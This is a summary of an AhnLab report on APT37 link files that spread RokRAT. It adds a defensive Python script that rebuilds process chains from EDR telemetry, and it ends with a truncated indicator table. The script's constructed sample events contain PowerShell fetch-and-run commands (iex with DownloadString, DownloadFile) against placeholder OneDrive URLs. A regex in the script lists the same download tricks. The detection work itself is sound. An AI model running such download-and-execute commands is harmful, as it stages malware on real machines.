Tracking and responding to RokRAT-distributing link files (*.lnk) with EDR products
(original title: EDR 제품을 통한 RokRAT 유포 링크 파일(*.lnk) 추적 및 대응)

2023-04-28, AhnLab (ASEC)

https://asec.ahnlab.com/ko/51868/


AhnLab reported follow-on EDR tracking of RedEyes (also tracked as APT37 or ScarCruft) after the group had distributed CHM malware disguised as security mail from a domestic financial company. The source describes malicious LNK files whose embedded PowerShell command drops a script file next to a legitimate-looking document under a temp path and opens a decoy PDF so the victim is less likely to notice the infection. AhnLab says its EDR exposes the resulting PowerShell and batch-file execution chain, identifies the affected host and the logged-in user, and recovers the URLs from which additional malware is downloaded. The report links the activity to RokRAT distribution and lists LNK and BAT hashes plus OneDrive API download URLs as indicators.
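The detection the summary describes, reconstructing the PowerShell and batch-file chain and pulling out host, user, dropped files and download URLs, as an added example in Python. This is not AhnLab's code and not the EDR's logic; it runs over constructed process-creation events (the ProcEvent layout, hostnames, user names, paths and the CONSTRUCTED-SAMPLE URLs are all assumptions), and it treats explorer.exe spawning powershell.exe as the proxy for a double-clicked LNK, since the LNK itself does not appear as a process.

```python
"""Added example (not AhnLab's code): reconstruct the LNK -> PowerShell -> batch
chain from EDR-style process-creation events and extract the host, user,
dropped batch files, decoy document and download URLs from it.
Event layout and every sample value below are constructed assumptions."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    user: str
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class Finding:
    host: str
    user: str
    chain: list        # image basenames, first-stage PowerShell first
    batch_files: list  # .bat/.cmd files run from a Temp path
    decoy_docs: list   # PDFs opened from a Temp path
    urls: list         # every URL seen in the chain's command lines
    cloud_urls: list   # subset on the OneDrive hosts named in the IoC table


PS_SUSP_RE = re.compile(
    r"-ep bypass|-executionpolicy bypass|-w(?:indowstyle)? hidden|\biex\b|"
    r"invoke-expression|downloadstring|downloadfile|-enc(?:odedcommand)?\b", re.I)
TEMP_RE = re.compile(r"\\Temp\\|\$env:TEMP|%TEMP%", re.I)
TEMP_FILE_RE = re.compile(r'[A-Za-z]:\\[^\s"]*\\Temp\\[^\s"]*\.(bat|cmd|pdf)', re.I)
URL_RE = re.compile(r"""https?://[^\s"'<>)\\]+""")
CLOUD_HOSTS = ("api.onedrive.com", "1drv.ms")  # hosts from the report's IoCs


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(ev, by_pid):
    """[ev, parent, grandparent, ...]; bounded so a pid cycle cannot loop."""
    chain = [ev]
    while chain[-1].ppid in by_pid and len(chain) < 32:
        chain.append(by_pid[chain[-1].ppid])
    return chain


def descendants(root, events, by_pid):
    return [e for e in events
            if e is not root and any(a.pid == root.pid for a in ancestry(e, by_pid)[1:])]


def detect(events):
    """Flag explorer.exe -> powershell.exe launches (how a double-clicked LNK
    shows up in process telemetry) whose arguments touch Temp and use
    hidden/bypass/download tricks, then gather everything spawned under them."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if basename(e.image) != "powershell.exe" or parent is None:
            continue
        if basename(parent.image) != "explorer.exe":
            continue
        if not PS_SUSP_RE.search(e.cmdline) or not TEMP_RE.search(e.cmdline):
            continue
        stage = [e] + descendants(e, events, by_pid)
        temp_files = [m for s in stage for m in TEMP_FILE_RE.finditer(s.cmdline)]
        urls = sorted({u for s in stage for u in URL_RE.findall(s.cmdline)})
        findings.append(Finding(
            host=e.host, user=e.user,
            chain=[basename(s.image) for s in stage],
            batch_files=[m.group(0) for m in temp_files if m.group(1).lower() in ("bat", "cmd")],
            decoy_docs=[m.group(0) for m in temp_files if m.group(1).lower() == "pdf"],
            urls=urls,
            cloud_urls=[u for u in urls if any(h in u.lower() for h in CLOUD_HOSTS)]))
    return findings


# Constructed sample telemetry (assumption; not from the report). The malicious
# chain is on WS-FIN-07; the last four events are benign controls.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    ProcEvent("WS-FIN-07", "CORP\\jkim", 4100, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("WS-FIN-07", "CORP\\jkim", 4212, 4100, PS,
              r"powershell.exe -windowstyle hidden -ep bypass -c $t=$env:TEMP; Start-Process $t\notice.pdf; "
              r"iex (New-Object Net.WebClient).DownloadString('https://api.onedrive.com/v1.0/CONSTRUCTED-SAMPLE')"),
    ProcEvent("WS-FIN-07", "CORP\\jkim", 4300, 4212, CMD,
              r'cmd.exe /c "C:\Users\jkim\AppData\Local\Temp\update.bat"'),
    ProcEvent("WS-FIN-07", "CORP\\jkim", 4310, 4300, PS,
              r"powershell -ep bypass -c (New-Object Net.WebClient).DownloadFile('https://1drv.ms/u/CONSTRUCTED-SAMPLE', $env:TEMP+'\x.dat')"),
    ProcEvent("WS-FIN-07", "CORP\\jkim", 4400, 4212, r"C:\Program Files\Adobe\Acrobat\Acrobat.exe",
              r"Acrobat.exe C:\Users\jkim\AppData\Local\Temp\notice.pdf"),
    ProcEvent("WS-FIN-07", "CORP\\jkim", 4500, 4100, PS, r"powershell.exe -NoProfile -File C:\Tools\inventory.ps1"),
    ProcEvent("SRV-ADM-01", "CORP\\admin", 4800, 700, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("SRV-ADM-01", "CORP\\admin", 5000, 4800, CMD, "cmd.exe"),
    ProcEvent("SRV-ADM-01", "CORP\\admin", 5010, 5000, PS,
              r"powershell -c (New-Object Net.WebClient).DownloadFile('https://intranet.corp.example/tools.zip', 'C:\tools.zip')"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.host} / {f.user}: {' -> '.join(f.chain)}")
        print("  batch:", f.batch_files, " decoy:", f.decoy_docs)
        print("  download URLs:", f.cloud_urls)
```

The parent-process condition is what keeps the admin download on SRV-ADM-01 quiet: the same DownloadFile call launched from a console is not the LNK pattern. Real telemetry adds noise this sample does not (pid reuse, encoded commands that need decoding before the regexes see them), so in production the suspicious-argument list would be a starting point for tuning rather than a fixed rule.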

Indicators of Compromise

Type   Value                                First seen   Last seen
URL    https://api.onedrive.com/v1.0/s…     2023-04-21   2023-07-04
URL    https://1drv.ms/i/s!AhXEXLJSNMP…     2023-04-21   2023-07-04
URL    https://1drv.ms/u/s!Au2my1xh6t8…     2023-04-21   2023-06-06
URL    https://api.onedrive.com/v1.0/s…     2023-04-21   2023-06-06
HASH   aa8ba9a029fa98b868be66b7d46e927b     2023-04-21   2023-05-23
HASH   0f5eeb23d701a2b342fc15aa90d97ae0     2023-04-21   2023-05-23
HASH   657fd7317ccde5a0e0c182a626951a9f     2023-04-21   2023-05-23
HASH   be32725e676d49eaa11ff51c61f18907     2023-04-21   2023-05-23
HASH   461ce7d6c6062d1ae33895d1f44d98fb     2023-04-21   2023-04-28
HASH   8fef5eb77e0a9ef2f97591d4d150a363     2023-04-21   2023-04-28

The URL values are truncated on this page and are reproduced as given; consult the ASEC post for the full share links. The hashes are 32 hexadecimal characters (the length of an MD5 digest) and the page does not state which are the LNK files and which the BAT files.
